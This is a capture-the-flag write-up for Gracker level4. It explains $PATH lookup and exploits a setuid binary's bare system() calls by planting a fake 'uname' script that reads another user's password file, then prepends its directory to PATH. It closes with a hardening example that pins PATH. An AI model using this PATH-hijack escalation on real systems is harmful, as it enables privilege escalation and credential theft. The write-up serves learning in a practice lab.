Gracker level4 (We ourselves must walk the $PATH - Buddha)

Try the challenge thoroughly before reading the write-up. Otherwise, it's your loss.

We ssh to the gracker host as level4 and authenticate using the password we obtained by solving the previous level.

Recap of previous level.

It is very important that you read the recap of the previous level. It explains in detail how the stack works and how to examine it using gdb. The approach I used here is similar.

Level4

Reading the story of level4 tells us what we'll have to do in this challenge: find out how PATH works and how a command we enter gets found and executed.

PATH is an environment variable in Linux and other UNIX-like operating systems which holds an ordered, colon-separated list of directories containing executable files. When a command is entered without a path, the shell searches these directories in order and runs the first match it finds. It is one of the most important environment variables, precisely because whoever controls it controls which binary a bare command name resolves to.

In this challenge the source code of the executable is available.

level4@gracker:/matrix/level4$ cat level4.c
#define _GNU_SOURCE   /* setresuid/setresgid are GNU extensions declared in unistd.h */
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(void) {
    gid_t gid;
    uid_t uid;
    /* Copy the effective (setuid-granted) ids into the real ids as well, so
     * every command spawned below runs entirely as the file's owner. */
    gid = getegid();
    uid = geteuid();
    setresgid(gid, gid, gid);
    setresuid(uid, uid, uid);

    printf("Zero Cool - Linux Information Gathering Tool v1.2\n");
    printf("\n[*] Get system information:\n");
    /* Each command is a bare name: /bin/sh resolves it via the caller's PATH. */
    system("uname -a");

    printf("\n[*] Find users available on this system:\n");
    system("cut -d: -f1,3,4 /etc/passwd");

    printf("\n[*] Search for setuid binaries:\n");
    system("find / -perm -4000 -exec ls -la {} \\; 2>/dev/null");
    return 0;
}

Thus, on running the binary, we are not asked for any input at all. The program just executes a few commands such as uname and cut, each given by bare name rather than by absolute path. So what we can do is change what these commands do: instead of having uname print the system information, we can have it print the password for the next level.

For that we first have to create an executable. Gracker allows us to create temporary files and directories under /tmp. So we need to do the following:

  • Create a temporary directory
  • Create a uname file in the directory with contents cat /home/level5/.pass
  • Make the uname file executable

level4@gracker:/matrix/level4$ mkdir /tmp/feignix
level4@gracker:/matrix/level4$ cd /tmp/feignix
level4@gracker:/tmp/feignix$ touch uname
level4@gracker:/tmp/feignix$ echo "cat /home/level5/.pass" > uname
level4@gracker:/tmp/feignix$ chmod +x uname

Let's try to run this file.

level4@gracker:/tmp/feignix$ ./uname
cat: /home/level5/.pass: Permission denied

It shows permission denied, which is what we expected: we have level4 permissions, and reading the password requires level5 permissions. The program /matrix/level4/level4 is owned by level5 and has the setuid bit set (see the -r-sr-x--- listing below), so when it runs it executes with level5's privileges, and the setresuid call in the source passes those privileges on to every command it spawns. If one of those commands is our uname script, it will be able to read the password.

We now have to change the PATH environment variable so that the shell looks in our custom directory /tmp/feignix for executables, and does so before it looks in the directory where the real uname binary lives.

level4@gracker:/matrix/level4$ printenv PATH
/usr/sbin/:/sbin/:/usr/local/bin:/usr/bin:/bin:/usr/games
level4@gracker:/matrix/level4$ PATH="/tmp/feignix:$PATH"
level4@gracker:/matrix/level4$ printenv PATH
/tmp/feignix:/usr/sbin/:/sbin/:/usr/local/bin:/usr/bin:/bin:/usr/games

Now that we have modified the PATH, all that remains is to run the level4 binary.

level4@gracker:/matrix/level4$ ./level4
Zero Cool - Linux Information Gathering Tool v1.2

[*] Get system information:
************

[*] Find users available on this system:
level0:1000:1000
level1:1001:1001
level2:1002:1002
level3:1003:1003
level4:1004:1004
level5:1005:1005
level6:1006:1006
level7:1007:1007
level8:1008:1008
level9:1009:1009
level10:1010:1010
level11:1011:1011
level12:1012:1012
level13:1013:1013

[*] Search for setuid binaries:
-r-sr-x--- 1 level7 level6 6240 Jun 25  2015 /matrix/level6/level6
-r-sr-x--- 1 level5 level4 7704 Jun 20  2015 /matrix/level4/level4
-r-sr-x--- 1 level3 level2 8648 Jun 19  2015 /matrix/level2/level2
-r-sr-x--- 1 level12 level11 4996 Jun 22  2015 /matrix/level11/level11
-r-sr-x--- 1 level1 level0 8448 Jun 19  2015 /matrix/level0/level0
-r-sr-x--- 1 level10 level9 6148 Jun 26  2015 /matrix/level9/level9
-r-sr-x--- 1 level2 level1 8608 Jun 19  2015 /matrix/level1/level1
-r-sr-x--- 1 level4 level3 7856 Jun 20  2015 /matrix/level3/level3
-r-sr-x--- 1 level13 level12 5980 Jul  9  2015 /matrix/level12/level12
-r-sr-x--- 1 level11 level10 8104 Jul  1  2015 /matrix/level10/level10
-r-sr-x--- 1 level8 level7 5380 Jun 26  2015 /matrix/level7/level7

And voilà! We have the password to the next level under [*] Get system information:. I have not shown the password here so that readers try the challenge on their own.
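To make the lookup rule concrete and show how the binary's author could have closed this hole, here is an added example that is not part of the challenge or of this write-up: resolve_in_path walks a colon-separated list the way /bin/sh does for system() and reports which file a bare command name lands on, and run_trusted is a drop-in for level4's bare system() calls that pins PATH to a fixed list before the shell starts. The "/tmp/feignix" entry is the directory from this write-up; the function names and TRUSTED_PATH are my own choices.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Fixed search path chosen by the program, not by whoever runs it. */
#define TRUSTED_PATH "/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin"

/* Resolve cmd as sh does for system(): walk the colon-separated list left to
 * right, take the first directory holding an executable regular file of that
 * name. An empty entry (leading ":" or "::") means ".". Returns 1/0. */
int resolve_in_path(const char *cmd, const char *path, char *out, size_t outlen) {
    const char *p = path;
    struct stat st;
    for (;;) {
        const char *colon = strchr(p, ':');
        size_t dirlen = colon ? (size_t)(colon - p) : strlen(p);
        const char *dir = dirlen ? p : ".";
        int n = snprintf(out, outlen, "%.*s/%s", dirlen ? (int)dirlen : 1, dir, cmd);
        if (n > 0 && (size_t)n < outlen && stat(out, &st) == 0 &&
            S_ISREG(st.st_mode) && access(out, X_OK) == 0)
            return 1;
        if (!colon)
            break;
        p = colon + 1;
    }
    out[0] = '\0';
    return 0;
}

/* Hardened replacement for level4's bare system() calls: overwrite PATH before
 * the shell starts, so a caller-supplied directory such as /tmp/feignix can
 * never win the lookup. Absolute paths ("/bin/uname -a") avoid it entirely. */
int run_trusted(const char *cmd) {
    if (setenv("PATH", TRUSTED_PATH, 1) != 0)
        return -1;
    return system(cmd);
}

int main(void) {
    char found[4096];
    const char *hijacked = "/tmp/feignix:" TRUSTED_PATH; /* constructed, as in the write-up */
    if (resolve_in_path("uname", hijacked, found, sizeof found))
        printf("with caller's PATH, uname resolves to: %s\n", found);
    if (resolve_in_path("uname", TRUSTED_PATH, found, sizeof found))
        printf("with pinned PATH, uname resolves to:   %s\n", found);
    return run_trusted("uname -a") == 0 ? 0 : 1;
}
```

Run it once with a plain shell and once after prepending a directory containing your own uname script; only the first printf line changes, because run_trusted's pinned PATH ignores the caller's value.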